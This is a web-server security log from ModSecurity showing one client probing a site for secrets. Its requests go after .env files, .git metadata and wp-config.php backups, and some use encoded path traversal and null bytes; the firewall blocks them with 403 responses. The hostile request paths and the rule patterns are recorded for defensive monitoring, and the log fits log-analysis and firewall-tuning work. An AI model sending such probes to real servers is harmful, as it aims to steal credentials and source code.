[Tue May 12 04:39:01.091076 2026] [security2:error] [pid 1730207:tid 1730223] [client 45.148.10.166:49910] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKSxTue9Sp-pIv_Bb61EAAAAU4"]
[Tue May 12 04:39:01.127821 2026] [security2:error] [pid 1730207:tid 1730221] [client 45.148.10.166:50154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwzue9Sp-pIv_Bb61BgAAAUw"], referer: https://tchatbooster.com/static../../.env
[Tue May 12 04:39:01.153943 2026] [security2:error] [pid 1730207:tid 1730221] [client 45.148.10.166:50154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.save"] [unique_id "agKSxTue9Sp-pIv_Bb61EQAAAUw"], referer: https://tchatbooster.com/.env.save
[Tue May 12 04:39:01.154155 2026] [security2:error] [pid 1730207:tid 1730221] [client 45.148.10.166:50154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.save"] [unique_id "agKSxTue9Sp-pIv_Bb61EQAAAUw"], referer: https://tchatbooster.com/.env.save
[Tue May 12 04:39:01.202105 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.166:50230] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/master"] [unique_id "agKSxdr1yOh9TvizeziPqQAAAE0"], referer: https://tchatbooster.com/.git/refs/heads/master
[Tue May 12 04:39:01.202352 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.166:50230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/master"] [unique_id "agKSxdr1yOh9TvizeziPqQAAAE0"], referer: https://tchatbooster.com/.git/refs/heads/master
[Tue May 12 04:39:01.413255 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxBfeipD4uoG21FoibwAAABc"]
[Tue May 12 04:39:01.416685 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.166:50152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw9r1yOh9TvizeziPpAAAAEE"], referer: https://tchatbooster.com/config/.env
[Tue May 12 04:39:01.432913 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:50068] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/HEAD"] [unique_id "agKSxRfeipD4uoG21FoidQAAAA8"], referer: https://tchatbooster.com/.git/HEAD
[Tue May 12 04:39:01.433141 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:50068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/HEAD"] [unique_id "agKSxRfeipD4uoG21FoidQAAAA8"], referer: https://tchatbooster.com/.git/HEAD
[Tue May 12 04:39:01.433198 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.gitignore"] [unique_id "agKSxRfeipD4uoG21FoidgAAABc"]
[Tue May 12 04:39:01.435220 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:50082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw81tk6y7yBJLpJopcwAAAIM"], referer: https://tchatbooster.com/.env~
[Tue May 12 04:39:01.435393 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.gitignore"] [unique_id "agKSxRfeipD4uoG21FoidgAAABc"]
[Tue May 12 04:39:01.785873 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:49882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwzue9Sp-pIv_Bb61AwAAAU8"]
[Tue May 12 04:39:01.814866 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:50082] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php~"] [unique_id "agKSxc1tk6y7yBJLpJopgQAAAIM"], referer: https://tchatbooster.com/wp-config.php~
[Tue May 12 04:39:01.815111 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:50082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php~"] [unique_id "agKSxc1tk6y7yBJLpJopgQAAAIM"], referer: https://tchatbooster.com/wp-config.php~
[Tue May 12 04:39:01.901904 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.166:49962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxDue9Sp-pIv_Bb61CwAAAUE"]
[Tue May 12 04:39:01.919866 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.166:50152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agKSxdr1yOh9TvizeziPqgAAAEE"], referer: https://tchatbooster.com/.git/config
[Tue May 12 04:39:01.920094 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.166:50152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agKSxdr1yOh9TvizeziPqgAAAEE"], referer: https://tchatbooster.com/.git/config
[Tue May 12 04:39:02.424298 2026] [security2:error] [pid 1730207:tid 1730232] [client 45.148.10.166:49894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSxDue9Sp-pIv_Bb61CgAAAVc"]
[Tue May 12 04:39:02.452786 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.166:50248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.example"] [unique_id "agKSxggpmE1yW0glLdgfDQAAAME"]
[Tue May 12 04:39:02.452957 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.166:50248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.example"] [unique_id "agKSxggpmE1yW0glLdgfDQAAAME"]
[Tue May 12 04:39:02.456120 2026] [core:error] [pid 1730175:tid 1730188] [client 45.148.10.166:50290] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env), referer: https://tchatbooster.com/%2e%2e/%2e%2e/.env
[Tue May 12 04:39:02.484151 2026] [security2:error] [pid 1730175:tid 1730180] [client 45.148.10.166:50036] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/main"] [unique_id "agKSxno6NvB9WXx5V-6etgAAAQM"], referer: https://tchatbooster.com/.git/refs/heads/main
[Tue May 12 04:39:02.484382 2026] [security2:error] [pid 1730175:tid 1730180] [client 45.148.10.166:50036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/main"] [unique_id "agKSxno6NvB9WXx5V-6etgAAAQM"], referer: https://tchatbooster.com/.git/refs/heads/main
[Tue May 12 04:39:02.551086 2026] [security2:error] [pid 1730175:tid 1730200] [client 45.148.10.166:49954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw3o6NvB9WXx5V-6epQAAARc"]
[Tue May 12 04:39:02.559294 2026] [security2:error] [pid 1820198:tid 1820218] [client 45.148.10.166:50102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw81tk6y7yBJLpJopdQAAAJI"], referer: https://tchatbooster.com/.env.development
[Tue May 12 04:39:03.256075 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.166:50402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSxxfeipD4uoG21FoiegAAABg"]
[Tue May 12 04:39:03.256274 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.166:50402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSxxfeipD4uoG21FoiegAAABg"]
[Tue May 12 04:39:03.257225 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.166:50346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production.local"] [unique_id "agKSxwgpmE1yW0glLdgfDgAAAMU"]
[Tue May 12 04:39:03.257370 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.166:50346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production.local"] [unique_id "agKSxwgpmE1yW0glLdgfDgAAAMU"]
[Tue May 12 04:39:03.257564 2026] [security2:error] [pid 1730175:tid 1730184] [client 45.148.10.166:49932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw3o6NvB9WXx5V-6eqgAAAQc"]
[Tue May 12 04:39:03.265559 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.166:50442] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKSxxfeipD4uoG21FoiewAAAAo"]
[Tue May 12 04:39:03.265640 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.166:50442] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKSxxfeipD4uoG21FoiewAAAAo"]
[Tue May 12 04:39:03.265677 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.166:50442] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKSxxfeipD4uoG21FoiewAAAAo"]
[Tue May 12 04:39:03.265714 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.166:50442] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKSxxfeipD4uoG21FoiewAAAAo"]
[Tue May 12 04:39:03.265881 2026] [security2:error] [pid 1808852:tid 1808865] [client 45.148.10.166:50442] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKSxxfeipD4uoG21FoiewAAAAo"]
[Tue May 12 04:39:03.269830 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
[Tue May 12 04:39:03.269886 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:50428] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSx81tk6y7yBJLpJophAAAAJY"]
